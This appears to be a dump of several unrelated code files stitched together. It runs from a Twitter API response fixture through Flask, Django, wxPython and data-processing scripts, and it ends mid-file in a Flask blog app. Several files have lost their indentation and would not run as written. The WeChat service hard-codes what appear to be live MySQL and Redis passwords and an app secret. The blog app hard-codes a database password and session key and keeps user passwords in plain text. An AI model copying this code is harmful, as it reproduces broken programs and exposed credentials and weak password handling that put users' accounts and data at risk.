"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_tile": False,
"profile_image_url": "http://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/617155406/1591372249",
"profile_link_color": "111111",
"profile_sidebar_border_color": "C0DEED",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": False,
"default_profile_image": False,
"following": None,
"follow_request_sent": None,
"notifications": None,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": False,
"retweet_count": 25,
"favorite_count": 212,
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"lang": "en"
},
{
"created_at": "Tue Sep 29 10:58:37 +0000 2020",
"id": 1310896758814396416,
"id_str": "1310896758814396416",
"text": "EMINENT SLEAZE - https://t.co/DmhTJv1JBY\n\n\ud83d\udcf7 by Andrew Hobbs https://t.co/CWbkFg3sNu",
"truncated": False,
"entities": {
"hashtags": [],
"symbols": [],
"user_mentions": [],
"urls": [
{
"url": "https://t.co/DmhTJv1JBY",
"expanded_url": "https://stevenwilson.lnk.to/ESSo",
"display_url": "stevenwilson.lnk.to/ESSo",
"indices": [
17,
40
]
}
],
"media": [
{
"id": 1310896723758325760,
"id_str": "1310896723758325760",
"indices": [
60,
83
],
"media_url": "http://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"media_url_https": "https://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"url": "https://t.co/CWbkFg3sNu",
"display_url": "pic.twitter.com/CWbkFg3sNu",
"expanded_url": "https://twitter.com/StevenWilsonHQ/status/1310896758814396416/photo/1",
"type": "photo",
"sizes": {
"thumb": {
"w": 150,
"h": 150,
"resize": "crop"
},
"large": {
"w": 2048,
"h": 2048,
"resize": "fit"
},
"small": {
"w": 680,
"h": 680,
"resize": "fit"
},
"medium": {
"w": 1200,
"h": 1200,
"resize": "fit"
}
}
}
]
},
"extended_entities": {
"media": [
{
"id": 1310896723758325760,
"id_str": "1310896723758325760",
"indices": [
60,
83
],
"media_url": "http://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"media_url_https": "https://pbs.twimg.com/media/EjE9n_TWoAA-DUd.jpg",
"url": "https://t.co/CWbkFg3sNu",
"display_url": "pic.twitter.com/CWbkFg3sNu",
"expanded_url": "https://twitter.com/StevenWilsonHQ/status/1310896758814396416/photo/1",
"type": "photo",
"sizes": {
"thumb": {
"w": 150,
"h": 150,
"resize": "crop"
},
"large": {
"w": 2048,
"h": 2048,
"resize": "fit"
},
"small": {
"w": 680,
"h": 680,
"resize": "fit"
},
"medium": {
"w": 1200,
"h": 1200,
"resize": "fit"
}
}
}
]
},
"metadata": {
"result_type": "popular",
"iso_language_code": "en"
},
"source": "<a href=\"https://about.twitter.com/products/tweetdeck\" rel=\"nofollow\">TweetDeck</a>",
"in_reply_to_status_id": None,
"in_reply_to_status_id_str": None,
"in_reply_to_user_id": None,
"in_reply_to_user_id_str": None,
"in_reply_to_screen_name": None,
"user": {
"id": 617155406,
"id_str": "617155406",
"name": "Steven Wilson",
"screen_name": "StevenWilsonHQ",
"location": "",
"description": "This is the official Twitter of musician, singer, songwriter and record producer Steven Wilson.",
"url": "https://t.co/G1ZbAQ0izd",
"entities": {
"url": {
"urls": [
{
"url": "https://t.co/G1ZbAQ0izd",
"expanded_url": "http://stevenwilsonhq.com",
"display_url": "stevenwilsonhq.com",
"indices": [
0,
23
]
}
]
},
"description": {
"urls": []
}
},
"protected": False,
"followers_count": 87118,
"friends_count": 25,
"listed_count": 762,
"created_at": "Sun Jun 24 14:14:45 +0000 2012",
"favourites_count": 4,
"utc_offset": None,
"time_zone": None,
"geo_enabled": False,
"verified": True,
"statuses_count": 1801,
"lang": None,
"contributors_enabled": False,
"is_translator": False,
"is_translation_enabled": False,
"profile_background_color": "0A0A0A",
"profile_background_image_url": "http://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_image_url_https": "https://abs.twimg.com/images/themes/theme1/bg.png",
"profile_background_tile": False,
"profile_image_url": "http://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_image_url_https": "https://pbs.twimg.com/profile_images/1238011880582586368/pN69tR68_normal.jpg",
"profile_banner_url": "https://pbs.twimg.com/profile_banners/617155406/1591372249",
"profile_link_color": "111111",
"profile_sidebar_border_color": "C0DEED",
"profile_sidebar_fill_color": "DDEEF6",
"profile_text_color": "333333",
"profile_use_background_image": True,
"has_extended_profile": False,
"default_profile": False,
"default_profile_image": False,
"following": None,
"follow_request_sent": None,
"notifications": None,
"translator_type": "none"
},
"geo": None,
"coordinates": None,
"place": None,
"contributors": None,
"is_quote_status": False,
"retweet_count": 19,
"favorite_count": 312,
"favorited": False,
"retweeted": False,
"possibly_sensitive": False,
"lang": "en"
}
],
"search_metadata": {
"completed_in": 0.023,
"max_id": 1311671856303411202,
"max_id_str": "1311671856303411202",
"next_results": "?max_id=1310896758814396415&q=from%3AStevenWilsonHQ&count=2&include_entities=1&result_type=mixed",
"query": "from%3AStevenWilsonHQ",
"refresh_url": "?since_id=1311671856303411202&q=from%3AStevenWilsonHQ&result_type=mixed&include_entities=1",
"count": 2,
"since_id": 0,
"since_id_str": "0"
}
}
# Pull the second URL entity of the first status out of the fixture and
# dump each of its fields as "key:value".
response = responseTwitter["statuses"][0]["entities"]["urls"][1]
for field_name, field_value in response.items():
    print(f"{field_name}:{field_value}")
|
from flask import Flask
from flask import request, Response
import MySQLdb
import urllib.request
import urllib.parse
import json
import time
import logging
import redis
# --- external service configuration ---
# SECURITY NOTE(review): live credentials are hard-coded in source; move
# them to environment variables / a secrets store and rotate these values.
redis_host = 'r-2ze42bfc8884f694.redis.rds.aliyuncs.com'
redis_port = 6379
redis_pwd = 'zhangrz@915'
mysql_host = 'rm-2zer7cl9103bs9k90125010.mysql.rds.aliyuncs.com'
mysql_port = 3306
mysql_user = 'control'
mysql_pwd = 'zhangrz@915'
mysql_database = 'lucky_user'
# WeChat appid -> app secret mapping used by the token/ticket endpoints.
app_index = {
    'wx53df963e29e4a7a9': '5ddf4191851dba79da4d290225484c9b'
}
app = Flask(__name__)
def get_access_token_api(appid, secret):
    """
    Fetch a WeChat access token for the given app credentials.

    Returns a dict: {'status': 0, 'access_token': ..., 'expire': seconds}
    on success, or {'status': -1, 'errmsg': ...} on any failure.
    """
    url = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s" % (appid, secret)
    rsp = {}
    try:
        # Context manager closes the HTTP response even when read() fails
        # (the original leaked the connection and let urlopen errors escape).
        with urllib.request.urlopen(url) as f:
            data = f.read()
    except Exception:
        rsp['status'] = -1
        rsp['errmsg'] = 'exception'
        return rsp
    if data is None:
        rsp['status'] = -1
        rsp['errmsg'] = 'rsp is none'
        return rsp
    try:
        js = json.loads(data)
    except ValueError:
        rsp['status'] = -1
        rsp['errmsg'] = 'json parse error'
        return rsp
    # WeChat signals failure by including an errcode field in the body.
    if 'errcode' in js:
        rsp['status'] = -1
        rsp['errmsg'] = js['errmsg']
        return rsp
    rsp['status'] = 0
    rsp['access_token'] = js['access_token']
    rsp['expire'] = js['expires_in']
    return rsp
def get_ticket_api(token):
    """
    Fetch a WeChat jsapi ticket using an access token.

    Returns a dict: {'status': 0, 'ticket': ..., 'expire': seconds} on
    success, or {'status': -1, 'errmsg': ...} on failure.
    """
    url = "https://api.weixin.qq.com/cgi-bin/ticket/getticket?access_token=%s&type=jsapi" % token
    rsp = {}
    try:
        # close the HTTP response deterministically
        with urllib.request.urlopen(url) as f:
            data = f.read()
    except Exception:
        rsp['status'] = -1
        rsp['errmsg'] = 'exception'
        return rsp
    if data is None:
        rsp['status'] = -1
        rsp['errmsg'] = 'rsp is none'
        return rsp
    try:
        js = json.loads(data)
    except ValueError:
        rsp['status'] = -1
        rsp['errmsg'] = 'json parse error'
        return rsp
    # getticket always carries errcode; errcode == 0 means success.
    if 'errcode' not in js:
        rsp['status'] = -1
        rsp['errmsg'] = 'miss errcode'
        return rsp
    if js['errcode'] != 0:
        rsp['status'] = -1
        rsp['errmsg'] = js['errmsg']
        # BUG FIX: the original fell through here, overwrote status with 0
        # and then raised KeyError on the missing 'ticket' key. Return the
        # error response instead.
        return rsp
    rsp['status'] = 0
    rsp['ticket'] = js['ticket']
    rsp['expire'] = js['expires_in']
    return rsp
@app.route("/")
def hello():
return "<h1 style='color:blue'>Hello There!</h1>"
@app.route("/get_access_token")
def get_access_token():
app_id = request.args.get("app_id")
if app_id is None:
return "{'msg':'app_id is miss'}"
r = redis.StrictRedis(host=redis_host, port=redis_port, password=redis_pwd)
data = r.get(app_id)
return data
@app.route("/get_ticket")
def get_ticket():
now = int(time.time())
app_id = request.args.get("app_id")
if app_id is None:
return "{'msg':'app_id is miss'}"
if app_id not in app_index:
return "{'msg':'can not find secret'}"
secret = app_index[app_id]
token_rsp = get_access_token_api(app_id, secret)
if 'status' not in token_rsp:
return "{'msg':'status not in rsp'}"
if token_rsp['status'] != 0:
return "{'msg':'gettoken status error:%s'}"%json.dumps(token_rsp)
access_token = token_rsp['access_token']
ticket_rsp = get_ticket_api(access_token)
if 'status' not in ticket_rsp:
return "{'msg':'status not in ticket_rsp'}"
if ticket_rsp['status'] != 0:
return "{'msg':'getticket status error:%s'}"%json.dumps(ticket_rsp)
data = {}
data['ticket'] = ticket_rsp['ticket']
data['expire_time'] = now + ticket_rsp['expire']
data_str = None
try:
data_str = json.dumps(data)
except:
return "{'msg':'json dump error'}"
return data_str
@app.route("/data_ack")
def data_ack():
now = int(time.time())
app_id = request.args.get("app_id")
if app_id is None:
return "{'msg':'app_id is miss'}"
if app_id not in app_index:
return "{'msg':'can not find secret'}"
count_name = request.args.get("name")
if count_name is None:
return "{'msg':'name is miss'}"
r = redis.StrictRedis(host=redis_host, port=redis_port, password=redis_pwd)
r.incr(count_name)
return "{'msg': 'ok'}"
# Campaign keyword list; get_lucky_ticket maps the client's comma-separated
# indexes into this list when building the lottery key.
word_index = [
    '抗击新冠',
    '复工复产',
    '直播带货',
    '小康生活',
    '十三五收官',
    '十九届五中全会',
    '故宫600年',
    '核心区控规',
    '崇文争先',
    '东城社工',
    '紫金服务',
    '对口帮扶',
    '文明城区',
    '垃圾分类',
    '光盘行动',
    '美丽院落',
    '接诉即办',
    '物业管理',
    '留白增绿',
    '王府井品牌节',
    '网红打卡地',
    '大戏东望',
    '老字号新生活',
]
@app.route("/get_lucky_ticket", methods=['POST'])
def get_lucky_ticket():
info = {}
name = request.json.get('name', None)
key_word = request.json.get('key_word', None)
if name is None:
info['msg'] = 'name is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
if key_word is None:
info['msg'] = 'key_word is miss'
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
word_index_array = sorted(key_word.split(','))
key_words = []
for index in word_index_array:
index = int(index)
if index >0 and index < len(word_index):
key_words.append(word_index[int(index)])
user_key = "%s_%s"%(name, '_'.join(key_words))
print("user_key %s"%user_key)
lucky_index = hash(user_key)%5
info['lucky_index'] = lucky_index
rsp = Response(json.dumps(info), mimetype='application/json')
return rsp
@app.route('/upload_info', methods=['POST'])
def upload_info():
    """Store a winner's contact info (name/phone/addr) in MySQL."""
    info = {}
    name = request.json.get('name', None)
    phone = request.json.get('phone', None)
    addr = request.json.get('addr', None)
    # validate required fields (messages match the original responses)
    for field, value in (('name', name), ('phone', phone), ('addr', addr)):
        if value is None:
            info['msg'] = '%s is miss' % field
            return Response(json.dumps(info), mimetype='application/json')
    try:
        db = MySQLdb.connect(host=mysql_host, port=mysql_port, user=mysql_user,
                             passwd=mysql_pwd, database=mysql_database, charset='utf8')
        try:
            cursor = db.cursor()
            # SECURITY FIX: parameterized query. The original interpolated
            # user-supplied values straight into the SQL string, allowing
            # SQL injection.
            sql = "insert into `user` (name, phone, addr) VALUES (%s, %s, %s)"
            ret = cursor.execute(sql, (name, phone, addr))
            print("execute ret:", ret)
            db.commit()
        finally:
            # close the connection even if execute/commit fails
            db.close()
    except Exception as e:
        print(e)
        info['msg'] = 'mysql error'
        return Response(json.dumps(info), mimetype='application/json')
    info['msg'] = 'ok'
    return Response(json.dumps(info), mimetype='application/json')
@app.route('/get_lucky_user')
def get_lucky_user():
    """List stored winners, paginated with ?offset=&count= (defaults 0/10)."""
    info = {}
    # SECURITY FIX: offset/count were interpolated directly into the SQL
    # string (injection via the query string). Coerce them to int and pass
    # them as query parameters.
    try:
        offset = int(request.args.get("offset", '0'))
        count = int(request.args.get("count", '10'))
    except ValueError:
        info['msg'] = 'offset/count must be integers'
        return Response(json.dumps(info), mimetype='application/json')
    try:
        db = MySQLdb.connect(host=mysql_host, port=mysql_port, user=mysql_user,
                             passwd=mysql_pwd, database=mysql_database, charset='utf8')
        try:
            cursor = db.cursor()
            sql = "select name, phone, addr from user limit %s, %s"
            cursor.execute(sql, (offset, count))
            results = cursor.fetchall()
            info['data'] = [
                {"name": row[0], "phone": row[1], "addr": row[2]}
                for row in results
            ]
        finally:
            db.close()
    except Exception as e:
        print(e)
        info['msg'] = 'mysql error'
        return Response(json.dumps(info), mimetype='application/json')
    return Response(json.dumps(info), mimetype='application/json')
if __name__ == '__main__':
    # Development entry point; not used when served through WSGI.
    app.run(debug=True, threaded=True)
# Module-level alias so WSGI servers (uWSGI/gunicorn) can find the app.
application = app
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Re-export the main easyaddress API at package level.
from .easyaddress import *
from .easyaddress_ship import API as ShipAPI  # TODO
# Public names exposed by `from package import *`.
__all__ = ['API', 'validate_email', 'validate_address']
|
import os
import sys
import tarfile
from datetime import datetime
from numpy import mean, sqrt, arange, array
import csv
##############################################################
# Use """ find folder_to_seatch -name "*.csv"| python parse_csv.py """ to run from command line
#initial RMS calculation
# Average absolute.deviation, and PSD at 1, 3, 6, and 10hz for each axis over one hour (or length of file if shorter than one hour) (eg x_abs, x_1hz, x_3hz, x_6hz, x_10hz)
#take root mean square of the x,y,z values to come up with rms_abs, rms_1, rms_3, rms_6, rms_10
def calculate_RMS():
for line in sys.stdin:
a_file = line.strip()
with open(a_file,'r') as csv_file:
x_abs = 0
x_1hz = 0
x_3hz = 0
x_6hz = 0
x_10hz = 0
y_abs = 0
y_1hz = 0
y_3hz = 0
y_6hz = 0
y_10hz = 0
z_abs = 0
z_1hz = 0
z_3hz = 0
z_6hz = 0
z_10hz = 0
length = 0
print a_file
csv_file.next() #skip the header
for line in csv_file:
length +=1
line = line.split(",")
x_abs += float(line[3])
x_1hz += float(line[6])
x_3hz += float(line[7])
x_6hz += float(line[8])
x_10hz += float(line[9])
y_abs += float(line[11])
y_1hz += float(line[14])
y_3hz += float(line[15])
y_6hz += float(line[16])
y_10hz += float(line[17])
z_abs += float(line[19])
z_1hz += float(line[22])
z_3hz += float(line[23])
z_6hz += float(line[24])
z_10hz += float(line[25])
if length > 600:
x_abs_avg = (x_abs/length)
x_1hz_avg = (x_1hz/length)
x_3hz_avg = (x_3hz/length)
x_6hz_avg = (x_6hz/length)
x_10hz_avg = (x_10hz/length)
y_abs_avg = (y_abs/length)
y_1hz_avg = (y_1hz/length)
y_3hz_avg = (y_3hz/length)
y_6hz_avg = (y_6hz/length)
y_10hz_avg = (y_10hz/length)
z_abs_avg = (z_abs/length)
z_1hz_avg = (z_1hz/length)
z_3hz_avg = (z_3hz/length)
z_6hz_avg = (z_6hz/length)
z_10hz_avg = (z_10hz/length)
# Calculate RMS for 5 dimensions
total_abs_avg = array([x_abs_avg, y_abs_avg, z_abs_avg])
rms_abs = sqrt(mean(total_abs_avg**2))
print "rms abs",rms_abs
total_1hz_avg = array([x_1hz_avg, y_1hz_avg, z_1hz_avg])
rms_1hz = sqrt(mean(total_1hz_avg**2))
print "rms 1hz",rms_1hz
total_3hz_avg = array([x_3hz_avg, y_3hz_avg, z_3hz_avg])
rms_3hz = sqrt(mean(total_3hz_avg**2))
print "rms 3hz",rms_3hz
total_6hz_avg = array([x_6hz_avg, y_6hz_avg, z_6hz_avg])
rms_6hz = sqrt(mean(total_6hz_avg**2))
print "rms 6hz",rms_6hz
total_10hz_avg = array([x_10hz_avg, y_10hz_avg, z_10hz_avg])
rms_10hz = sqrt(mean(total_10hz_avg**2))
print "rms 10hz",rms_10hz
label_id = 1
# append data to master_hourly.CSV
### CHANGE SO IT TAKES THE FILENAME AND LABEL ID OF CONTROL OR PARKINSONS
filename = "test_parkinsons_master_hourly.csv"
with open(filename, 'ab') as csvfile:
linewriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
linewriter.writerow([rms_abs, rms_1hz, rms_3hz, rms_6hz, rms_10hz, label_id,a_file])
calculate_RMS()
|
from django.contrib import admin
from .models import Order, OrderProduct
from user.models import User
from product.models import Product
# Register your models here.
class OrderAdmin(admin.ModelAdmin):
    # Columns shown in the Order changelist.
    # NOTE(review): 'username' must exist as a field or callable on Order
    # (or on this admin) -- confirm against the Order model.
    list_display = ('username',
                    'total_price', 'ordered_date',)
@admin.register(OrderProduct)
class OrderProductAdmin(admin.ModelAdmin):
    """Changelist configuration for order line items."""
    # Columns in the changelist; order and product link to the change form.
    list_display = ('order', 'product', 'quantity')
    list_display_links = ('order', 'product')
# Order uses classic registration (OrderProduct is registered via decorator).
admin.site.register(Order, OrderAdmin)
|
#!/usr/bin/env python
def help():
    # Usage text printed for -h/-help/--help (see argument parsing below).
    HELP_TEXT = """
#############################################################################
# MergeReplicateData.py
#
# Takes an SGA rawdata file as input and determines how many replicates there
# are for each query. It then spits the data back out renaming replicates to
# split them up. Explore 2,3,4,5,6. In fact, we might as well explore all
# the possibilties within this framework. This scrip
#
# Author: Benjamin VanderSluis (bvander@cs.umn.edu)
# Revision: May 25, 2012
#
# USAGE:
# MergeReplicateData.py split_param ReplicateList.txt BatchList.txt BigDataFile[.gz]
#
# INPUTS:
# ReplicateList head's up so we know which queries to grab
# BatchList mapping of query_setid -> batch
# BigDataFile contains all of the source data
#
# OUTPUTS: output1 output2
# Each run splits the replicate set into two complementary groups,
# then writes one groups (and accompanying batch) to output1 and
# the other to output2
#
#############################################################################
"""
    print HELP_TEXT
    return
################ MAIN FUNCTION
# imports and constants
import sys
import os
import fileinput

## Step 0: argument parsing and existence checks and help
if sys.argv.count('-h') + sys.argv.count('-help') + sys.argv.count('--help') > 0:
    help()
    exit()
if len(sys.argv) < 4:
    print 'too few arguments (try "-h" for help)'
    exit()

split_param = sys.argv[1] # ex 1,2,4 -> [1,2,4] [3,5,6,7]
replicate_file = sys.argv[2]
batch_file = sys.argv[3]
big_data_file = sys.argv[4]

# Now ensure that these all exist and we're allowed to write the output
# if we fail because of this, we want to fail before doing a lot of work
if not os.path.exists(replicate_file):
    print 'replicate_file "' + replicate_file + '" does not exist'
    exit()
if not os.path.exists(batch_file):
    print 'batch_file "' + batch_file + '" does not exist'
    exit()
if not os.path.exists(big_data_file):
    print 'big_data_file "' + big_data_file + '" does not exist'
    exit()

## Step 1: Read in our our list of queries and the number of replicates to expect
# I'm assumming that replicates are never in the same batch
replicate_queries = {} # query -> num_setids
replicate_fid = open(replicate_file, 'r')
replicate_fid.readline() # header line
for line in replicate_fid:
    line = line.strip().split('\t')
    # keep only queries with at least 6 replicate sets ...
    #if int(line[3]) >= 5:
    if int(line[3]) >= 6:
        # ... and fewer than 2 entries in columns 1+2 (flags -- TODO confirm meaning)
        if int(line[1]) + int(line[2]) < 2:
            replicate_queries[line[0]] = line[3]
        else:
            sys.stderr.write("problem with query: "+line[0]+"\n")

## Step 2: Hash the batch mapping file
keep_batches = set()
query_setids = {}
batch_fid = open(batch_file, 'r')
for line in batch_fid:
    line = line.strip().split('\t')
    # add this set to the list for this query; id format is "<query>_<setid>"
    query = '_'.join(line[0].split('_')[:-1])
    qset = line[0].split('_')[-1]
    if query not in query_setids:
        query_setids[query] = set()
    query_setids[query].add(qset)
    if query in replicate_queries:
        keep_batches.add(line[1])

## Step 3: For each query, split the set ids into two groups
# group1 holds the 0-based positions selected by split_param.
group1 = [int(x)-1 for x in split_param.split(',')]
size1 = len(group1)
size2 = {}
setA = {}
for query in replicate_queries:
    # NOTE(review): query_setids[query] is a set, so list(...) ordering is
    # arbitrary and the group membership is not reproducible between runs;
    # consider sorted(query_setids[query]) -- confirm intent.
    setA[query] = [list(query_setids[query])[x] for x in group1]
    size2[query] = len(query_setids[query]) - size1

## Step 4: Iterate through the scorefile
# keep replicate queries, renameing them
# keep anything in keep_batches
# Result can be appended to a short set.
if big_data_file[-3:] == '.gz':
    big_data_fid = fileinput.hook_compressed(big_data_file, 'r')
else:
    big_data_fid = open(big_data_file, 'r')
for line in big_data_fid:
    line = line.strip().split('\t')
    if line[0] in replicate_queries:
        # rename the query with an _A/_B group suffix and group size
        if line[3] in setA[line[0]]:
            line[0] = line[0]+'_A'+str(size1)
        else:
            line[0] = line[0]+'_B'+str(size2[line[0]])
        print('\t'.join(line))
    #elif line[5] in keep_batches:
        #print('\t'.join(line))
|
# !/usr/bin/python
# coding:utf-8
from wx import *
import net_UI2
import net_tools
class CalFrame(net_UI2.MyFrame2):
    """Network calculator window; event handlers for the generated net_UI2.MyFrame2 UI."""

    def __init__(self, parent):
        net_UI2.MyFrame2.__init__(self,parent)

    def Calnet(self, event):
        '''
        Compute and display the network figures for the IP and mask bits
        currently entered in the UI.
        :param event: wx event (unused)
        :return: (ip, mask_bit, net, netmask, firstAddr, broadcast)
        '''
        ip = self.m_textCtrl1.GetValue() # the IP address entered by the user
        mask_bit = str(self.m_choice2.GetCurrentSelection()) # selected mask bit count
        # print mask_bit
        host_num = net_tools.host_num(mask_bit) # number of usable host addresses
        self.m_textCtrl2.SetValue(str(host_num))
        net = net_tools.networkAddr(ip,mask_bit) # network address
        # print net
        self.m_textCtrl4.SetValue(str(net))
        netmask = net_tools.netmask(ip, mask_bit) # dotted-quad subnet mask
        self.m_textCtrl3.SetValue(str(netmask))
        firstAddr = net_tools.firstAvailAddr(ip, mask_bit)
        self.m_textCtrl6.SetValue(str(firstAddr))
        # lastAddr = net_tools.lastAvailAddr(ip, mask_bit)
        # self.m_textCtrl10.SetValue(str(lastAddr))
        broadcast = net_tools.broadcast(ip, mask_bit)
        self.m_textCtrl5.SetValue(str(broadcast))
        return ip,mask_bit,net,netmask,firstAddr,broadcast

    def subnet_exchange(self,event):
        '''
        Convert a dotted-quad subnet mask to its bit count,
        e.g. 255.255.255.0 -> 24.
        '''
        netmask1 = self.m_textCtrl10.GetValue()
        bits_sum = net_tools.exchange_mask(netmask1)
        self.m_textCtrl11.SetValue(bits_sum)

    def bits_exchange(self, event):
        # Convert a mask bit count into dotted-quad and hex mask forms.
        bits = self.m_textCtrl12.GetValue()
        lists = net_tools.exchange_bit(bits)
        try:
            netmask = lists[0]
            netmask_hex = lists[1]
        except Exception:
            # exchange_bit returned a single value: reuse it for both fields
            netmask = lists[0]
            netmask_hex= lists[0]
        self.m_textCtrl14.SetValue(netmask)
        self.m_textCtrl15.SetValue(netmask_hex)

    def ip_exchange(self,event):
        # Convert an IP address into decimal and hex string forms.
        ip = self.m_textCtrl7.GetValue()
        lists = net_tools.exchange_ip(ip)
        try:
            ip_str = lists[0]
            ip_hex = lists[1]
        except Exception:
            ip_str = lists[0]
            ip_hex = lists[0]
        self.m_textCtrl8.SetValue(ip_str)
        self.m_textCtrl9.SetValue(ip_hex)

    def get(self,event):
        # NOTE(review): reads the two fields but does nothing with them --
        # looks like a dead/unfinished handler; confirm before removing.
        ip = self.m_textCtrl2.GetValue() # IP value
        mask_bit = self.m_textCtrl3.GetValue() # mask bit value

    def get_list(self, event):
        # Recompute the figures and export a text report (plus the list of
        # subnet addresses) to a hard-coded desktop path.
        ip, mask_bit, net, netmask, firstAddr, broadcast = self.Calnet(event)
        ip_data = '输入的ip为:{0}'.format(ip)
        mask_bit_data = '输入的掩码位:{0}'.format(str(mask_bit))
        net_data = '网络地址为:{0}'.format(str(net))
        netmask_data = '掩码:{0}'.format(str(netmask))
        firstAddr_data = '第一个可用地址:{0}'.format(str(firstAddr))
        broadcast_data = '广播地址:{0}'.format(str(broadcast))
        l = net_tools.subnet_ip(ip, mask_bit)
        try:
            # NOTE(review): hard-coded, user-specific output path
            with open('/home/xujn/桌面/net.txt', 'w') as f:
                f.write("网络和IP转换器\n")
                f.write(str(ip_data))
                f.write('\n')
                f.write(mask_bit_data)
                f.write('\n')
                f.write(net_data)
                f.write('\n')
                f.write(netmask_data)
                f.write('\n')
                f.write(firstAddr_data)
                f.write('\n')
                f.write(broadcast_data)
                f.write('\n')
                f.write('网络地址列表')
                f.write('\n')
                for i in l:
                    f.write(str(i))
                    f.write('\n')
                f.write("子网掩码转换器\n")
                f.close() # redundant inside "with"; kept as-is
        except Exception:
            # show an "export failed" dialog on any error
            dlg = wx.MessageDialog(None, u"导出失败", u"错误", wx.YES_NO | wx.ICON_QUESTION)
            if dlg.ShowModal() == wx.ID_YES:
                # self.Close(True)
                dlg.Destroy()

    def get_host(self,event):
        # Show "hostname:MAC" for the local machine.
        hname = net_tools.get_ip_hostname()[0]
        mac = net_tools.get_mac_address()
        ip_mac = str(hname+":"+mac)
        self.m_textCtrl151.SetValue(ip_mac)
# Create the wx application object and show the calculator window.
# NOTE(review): this module only does `from wx import *`, which does not
# bind the name `wx` itself -- confirm `wx` is in scope (e.g. imported via
# net_UI2) or add an explicit `import wx`.
app1 = wx.App()
frame = CalFrame(None)
frame.Show()
# main event loop
app1.MainLoop()
|
from setuptools import setup
# Packaging metadata. All requirement pins are exact (==); relax to ranges
# if this package is meant to be installed alongside other projects.
setup(
    name="mywhopackage",
    install_requires=["django==1.0",],
    # optional extras: `pip install mywhopackage[test]` / `[docs]`
    extras_require={"test": ["pytest==2.0",], "docs": ["Sphinx==1.0",],},
)
|
from flask import Flask, request, redirect, render_template, session
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# SECURITY NOTE(review): the database password and secret_key are hard-coded
# in source; move them to environment/config and rotate.
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://Blogz:Khr0no$1@localhost:8889/Blogz'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
app.secret_key = 'dgfdg5v65fj51g621g6'
class Users(db.Model):
    # Primary key.
    id = db.Column(db.Integer, primary_key=True)
    # Login name; uniqueness enforced at the DB level.
    username = db.Column(db.String(20), unique=True)
    # SECURITY NOTE(review): passwords are stored and compared in plain text
    # (see the login/registration handlers); they should be hashed.
    password = db.Column(db.String(20))
    # One-to-many: this user's posts; gives Bloggz instances an .owner backref.
    blogs = db.relationship('Bloggz', backref='owner')

    def __init__(self, username, password):
        self.username = username
        self.password = password
class Bloggz(db.Model):
    # Primary key.
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(75))
    content = db.Column(db.String(500))
    # FK to the authoring user; Users.blogs supplies the .owner backref.
    owner_id = db.Column(db.Integer, db.ForeignKey('users.id'))

    def __init__(self, title, content, owner):
        self.title = title
        self.content = content
        self.owner = owner
@app.before_request
def require_login():
    """Redirect anonymous users away from endpoints that need a session."""
    # BUG FIX: blog_submit also reads session['username'] and crashed with a
    # KeyError for anonymous users; require login for it as well.
    login_required = ['add_page', 'blog_submit']
    if 'username' not in session and request.endpoint in login_required:
        return redirect('/login')
@app.route('/logout', methods=['POST', 'GET'])
def logout():
    """End the current session and go back to the home page."""
    # BUG FIX: `del session['username']` raised KeyError when nobody was
    # logged in; pop() is safe either way.
    session.pop('username', None)
    return redirect('/')
@app.route('/ind_blog', methods=['GET'])
def blog():
    """Render a single blog post selected by ?id=."""
    post_id = request.args['id']
    selected = Bloggz.query.filter_by(id=post_id).first()
    return render_template('/ind_blog.html', post=selected)
@app.route('/single_user', methods=['GET'])
def user_page():
    """Render all posts belonging to one user (?id= is the user's id)."""
    id = request.args['id']
    # BUG FIX: the original filtered Bloggz by its own primary key (id=id),
    # which returns at most the one post whose id happens to equal the
    # *user* id. Filter by the owner foreign key instead; newest first.
    posts = reversed(Bloggz.query.filter_by(owner_id=id).all())
    return render_template('singleUser.html', id=id, posts=posts)
@app.route('/blog_submit', methods=['POST', 'GET'])
def blog_submit():
    """Validate and save a new blog post, then redirect to it."""
    # BUG FIX: the original created and committed an *empty* Bloggz row on
    # every GET request, because the creation code sat outside the POST
    # branch. GET now just shows the form.
    if request.method != 'POST':
        return render_template('addnew.html')
    owner = Users.query.filter_by(username=session['username']).first()
    title = request.form['blog-title']
    content = request.form['blog-content']
    title_error = ''
    content_error = ''
    if title == '':
        title_error = """Don't you want to title your Blog post?"""
    if content == '':
        content_error = """Where is your blog post? I don't see it anywhere!"""
    if title_error or content_error:
        return render_template('addnew.html', title_error=title_error, content_error=content_error)
    blog = Bloggz(title, content, owner)
    db.session.add(blog)
    db.session.commit()
    # the id is populated by the commit above
    return redirect('/ind_blog?id=' + str(blog.id))
@app.route('/add_new', methods=['POST', 'GET'])
def add_page():
    """Show the new-post form (login is enforced by require_login)."""
    return render_template('/addnew.html')
@app.route("/log_val", methods=['GET', 'POST'])
def login_validation():
username = ''
password = ''
username_error=''
password_error=''
valid=True
if request.method == 'POST':
username = request.form['user-name']
password = request.form['password']
user = Users.query.filter_by(username=username).first()
if user and user.password == password:
session['username'] = username
return redirect('/')
else:
return '<h1>ERROR!!</h1>'
@app.route('/login', methods=['POST', 'GET'])
def login():
    """Render the login form."""
    return render_template('/login.html')
@app.route("/reg_val", methods=['GET', 'POST'])
